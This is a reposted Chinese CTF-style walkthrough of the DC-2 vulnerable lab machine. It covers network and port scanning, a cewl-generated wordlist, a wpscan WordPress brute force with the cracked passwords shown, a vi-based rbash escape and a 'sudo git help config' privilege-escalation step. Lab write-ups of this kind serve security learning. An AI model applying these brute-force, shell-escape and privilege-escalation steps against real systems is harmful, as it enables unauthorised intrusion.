微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

DC-2

DC-2
扫描局域网内所有设备

arp-scan -l

在这里插入图片描述

nmap -p- -sV 扫描所有端口

在这里插入图片描述

880,7744端口,访问一下进不去
只能改hosts文件进去

在这里插入图片描述

页面使用的技术

在这里插入图片描述

用awvs扫一下(awvs yyds!)

在这里插入图片描述


可是好像msf没有收录这些漏洞

在这里插入图片描述


flag提示用cewl

Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件

cewl http://dc-2 -w 1.txt

在这里插入图片描述


nikto工具扫描后台

nikto -host http://192.168.xx.xx   (认扫描80端口)

在这里插入图片描述

wpscan(kali中针对wordpress的漏洞扫描工具)

wpscan --url http://www.xxxxx.wiki/

在这里插入图片描述


admin jerry tom

$ wpscan --url http://dc-2 -U /home/t123/桌面/user.txt -P /home/t123/桌面/cewl.txt //不知道路径可以用pwd看看

@H_404_91@


[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient

登录,查看到flag2

在这里插入图片描述


ssh链接后rbash

在这里插入图片描述

如果bash以rbash这个名字启动,或者是通过-r选项调用时,那么这个shell就会受

绕过rbash

compgen -c  //查看当前用户可执行命名,发现有vi

vi编辑器绕过
在命令行中,输入 vi,在末行模式中,输入 :set shell=/bin/bash在这里插入代码
这里就直接将shell设置为/bin/bash
接着在执行命令 :shell就好了
然后就有一个无限制的shell了
绕过rbash

git提权

sudo git help config

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。

相关推荐